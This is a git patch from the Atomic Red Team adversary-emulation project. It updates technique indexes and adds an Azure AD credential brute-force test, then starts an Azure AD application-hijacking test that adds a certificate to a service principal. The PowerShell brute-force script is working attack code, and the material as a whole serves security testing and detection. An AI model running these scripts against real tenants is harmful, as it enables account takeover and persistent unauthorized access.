/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index b8f07370..d5a392a7 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -59,6 +59,7 @@ credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6 credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell +credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index a548ba38..61ce7560 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -9,6 +9,7 @@ credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,b credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash +credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 8469a3a7..debc08d8 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -98,6 +98,7 @@ - [T1110.001 Password Guessing](../../T1110.001/T1110.001.md) - Atomic Test #1: Brute Force Credentials of all Active Directory domain users via SMB [windows] - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows] + - Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad] - T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md) - Atomic Test #1: Password Spray all Domain Users [windows] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index d44165af..4517c9e3 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -30,7 +30,8 @@ - Atomic Test #1: Packet Capture Linux [linux] - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md) + - Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad] - T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md) - Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad] diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index ca519231..1b4a0a45 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md @@ -21,7 +21,7 @@ | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Systemd Timers](../../T1053.006/T1053.006.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | -| | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | [Process Discovery](../../T1057/T1057.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 59dc6eed..c3270f93 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -4425,6 +4425,55 @@ credential-access: } } Write-Host "End of bruteforce" + - name: Brute Force Credentials of single Azure AD user + auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69 + description: 'Attempt to brute force Azure AD user via AzureAD powershell module. + +' + supported_platforms: + - azure-ad + input_arguments: + username: + description: Account to bruteforce. We encourage users running this atomic + to add a valid microsoft account domain; for eg "bruce.wayne@" + type: String + default: bruce.wayne@contoso.com + passwords: + description: List of passwords we will attempt to brute force with + type: String + default: Password1`n1q2w3e4r`nPassword! + dependency_executor_name: powershell + dependencies: + - description: 'AzureAD module must be installed. + +' + prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1} + +' + get_prereq_command: 'Install-Module -Name AzureAD -Force + +' + executor: + name: powershell + elevation_required: false + command: | + Import-Module -Name AzureAD + + $passwords = "#{passwords}".split("{`n}") + foreach($password in $passwords) { + $PWord = ConvertTo-SecureString -String "$password" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + try { + Write-Host " [-] Attempting ${password} on account #{username}." + Connect-AzureAD -Credential $Credential 2>&1> $null + # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success + Write-Host " [!] #{username}:${password} are valid credentials!`r`n" + break + } catch { + Write-Host " [-] #{username}:${password} invalid credentials.`r`n" + } + } + Write-Host "End of bruteforce" T1555.005: technique: external_references: diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md index bb98a2d2..c76ba1bd 100644 --- a/atomics/T1110.001/T1110.001.md +++ b/atomics/T1110.001/T1110.001.md @@ -29,6 +29,8 @@ In default environments, LDAP and Kerberos connection attempts are less likely t - [Atomic Test #2 - Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)](#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos) +- [Atomic Test #3 - Brute Force Credentials of single Azure AD user](#atomic-test-3---brute-force-credentials-of-single-azure-ad-user) +
@@ -131,4 +133,66 @@ Write-Host "End of bruteforce" +
+
+ +## Atomic Test #3 - Brute Force Credentials of single Azure AD user +Attempt to brute force Azure AD user via AzureAD powershell module. + +**Supported Platforms:** Azure-ad + + +**auto_generated_guid:** 5a51ef57-299e-4d62-8e11-2d440df55e69 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Account to bruteforce. We encourage users running this atomic to add a valid microsoft account domain; for eg "bruce.wayne@" | String | bruce.wayne@contoso.com| +| passwords | List of passwords we will attempt to brute force with | String | Password1`n1q2w3e4r`nPassword!| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Import-Module -Name AzureAD + +$passwords = "#{passwords}".split("{`n}") +foreach($password in $passwords) { + $PWord = ConvertTo-SecureString -String "$password" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + try { + Write-Host " [-] Attempting ${password} on account #{username}." + Connect-AzureAD -Credential $Credential 2>&1> $null + # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success + Write-Host " [!] #{username}:${password} are valid credentials!`r`n" + break + } catch { + Write-Host " [-] #{username}:${password} invalid credentials.`r`n" + } +} +Write-Host "End of bruteforce" +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: AzureAD module must be installed. +##### Check Prereq Commands: +```powershell +if (Get-Module AzureAD) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AzureAD -Force +``` + + + +
From 2411b3600817f579c7fcd8075b2a8b7d78f2760b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Cl=C3=A9ment=20Notin?= Date: Thu, 8 Jul 2021 19:23:05 +0200 Subject: [PATCH 04/19] T1098.001: implement AAD application hijacking tests (#1454) * T1098.001: implement AAD application hijacking tests Create Azure AD Application Hijacking Tests * T1098.001 : add end of test string * T1098.001: use new "azure-ad" platform * T1098.001: use new "azure-ad" platform * Update T1098.001.yaml * Update T1098.001.yaml * Update T1098.001.yaml Co-authored-by: piaconsigny <49986009+piaconsigny@users.noreply.github.com> --- atomics/T1098.001/T1098.001.yaml | 170 ++++++++++++++++++++++++++++++- 1 file changed, 169 insertions(+), 1 deletion(-) diff --git a/atomics/T1098.001/T1098.001.yaml b/atomics/T1098.001/T1098.001.yaml index 6435b055..4c349f97 100644 --- a/atomics/T1098.001/T1098.001.yaml +++ b/atomics/T1098.001/T1098.001.yaml @@ -1,6 +1,171 @@ attack_technique: T1098.001 display_name: 'Account Manipulation: Additional Cloud Credentials' atomic_tests: +- name: Azure AD Application Hijacking - Service Principal + auto_generated_guid: b8e747c3-bdf7-4d71-bce2-f1df2a057406 + description: | + Add a certificate to an Application through its Service Principal. + The certificate can then be used to authenticate as the application and benefit from its rights. + An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA. + supported_platforms: + - azure-ad + input_arguments: + username: + description: Azure AD username + type: String + default: jonh@contoso.com + password: + description: Azure AD password + type: String + default: p4sswd + service_principal_name: + description: Name of the targeted service principal + type: String + default: SuperSP + certificate_password: + description: Password of the new certificate + type: string + default: Passw0rd + path_to_cert: + description: Path of the new certificate, locally stored + type: string + default: $env:TEMP + dependency_executor_name: powershell + 